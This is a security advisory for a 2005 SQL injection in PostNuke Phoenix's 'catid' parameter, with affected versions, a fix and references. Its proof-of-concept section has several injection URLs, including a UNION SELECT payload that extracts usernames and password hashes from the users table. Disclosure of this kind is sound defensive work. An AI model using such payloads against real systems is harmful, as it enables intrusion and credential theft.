PostNuke Phoenix CATID Parameter Remote SQL Injection Vulnerability
BID:12683
Info
PostNuke Phoenix CATID Parameter Remote SQL Injection Vulnerability
| Bugtraq ID: | 12683 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 28 2005 12:00AM |
| Updated: | Feb 28 2005 12:00AM |
| Credit: | Discovery is credited to Maksymilian Arciemowicz <[email protected]>. |
| Vulnerable: |
PostNuke Development Team PostNuke Phoenix 0.760 RC2 PostNuke Development Team PostNuke Phoenix 0.750 PostNuke Development Team PostNuke Phoenix 0.726 PostNuke Development Team PostNuke Phoenix 0.723 PostNuke Development Team PostNuke Phoenix 0.722 PostNuke Development Team PostNuke Phoenix 0.721 |
| Not Vulnerable: |
PostNuke Development Team PostNuke Phoenix 0.760 RC3 |
Discussion
PostNuke Phoenix CATID Parameter Remote SQL Injection Vulnerability
PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input.
It is reported that issue presents itself when malicious SQL syntax is issued to the application through the 'catid' variable.
PostNuke 0.760-RC2 and prior versions are reported vulnerable.
PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input.
It is reported that issue presents itself when malicious SQL syntax is issued to the application through the 'catid' variable.
PostNuke 0.760-RC2 and prior versions are reported vulnerable.
Exploit / POC
PostNuke Phoenix CATID Parameter Remote SQL Injection Vulnerability
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/index.php?catid='cXIb8O3
http://www.example.com/modules.php?op=modload&name=News&file=article&sid=1&catid='cXIb8O3
http://www.example.com/admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8O3
http://www.example.com/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_
uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20[$PREFIX]users%20WHERE%20pn_uid=2/
*
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/index.php?catid='cXIb8O3
http://www.example.com/modules.php?op=modload&name=News&file=article&sid=1&catid='cXIb8O3
http://www.example.com/admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8O3
http://www.example.com/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_
uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20[$PREFIX]users%20WHERE%20pn_uid=2/
*
Solution / Fix
PostNuke Phoenix CATID Parameter Remote SQL Injection Vulnerability
Solution:
The vendor has released PostNuke 0.760 RC3 to address this issue.
PostNuke Development Team PostNuke Phoenix 0.721
PostNuke Development Team PostNuke Phoenix 0.722
PostNuke Development Team PostNuke Phoenix 0.723
PostNuke Development Team PostNuke Phoenix 0.726
PostNuke Development Team PostNuke Phoenix 0.750
PostNuke Development Team PostNuke Phoenix 0.760 RC2
Solution:
The vendor has released PostNuke 0.760 RC3 to address this issue.
PostNuke Development Team PostNuke Phoenix 0.721
-
PostNuke Development Team PostNuke Phoenix 0.760RC3
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-4 59.html
PostNuke Development Team PostNuke Phoenix 0.722
-
PostNuke Development Team PostNuke Phoenix 0.760RC3
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-4 59.html
PostNuke Development Team PostNuke Phoenix 0.723
-
PostNuke Development Team PostNuke Phoenix 0.760RC3
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-4 59.html
PostNuke Development Team PostNuke Phoenix 0.726
-
PostNuke Development Team PostNuke Phoenix 0.760RC3
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-4 59.html
PostNuke Development Team PostNuke Phoenix 0.750
-
PostNuke Development Team PostNuke Phoenix 0.760RC3
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-4 59.html
PostNuke Development Team PostNuke Phoenix 0.760 RC2
-
PostNuke Development Team PostNuke Phoenix 0.760RC3
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-4 59.html
References
PostNuke Phoenix CATID Parameter Remote SQL Injection Vulnerability
References:
References:
- PostNuke Homepage (PostNuke Development Team)
- PostNuke Security Advisory PNSA 2005-1 (PostNuke Development Team)
- [SECURITYREASON.COM] PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1 (Maksymilian Arciemowicz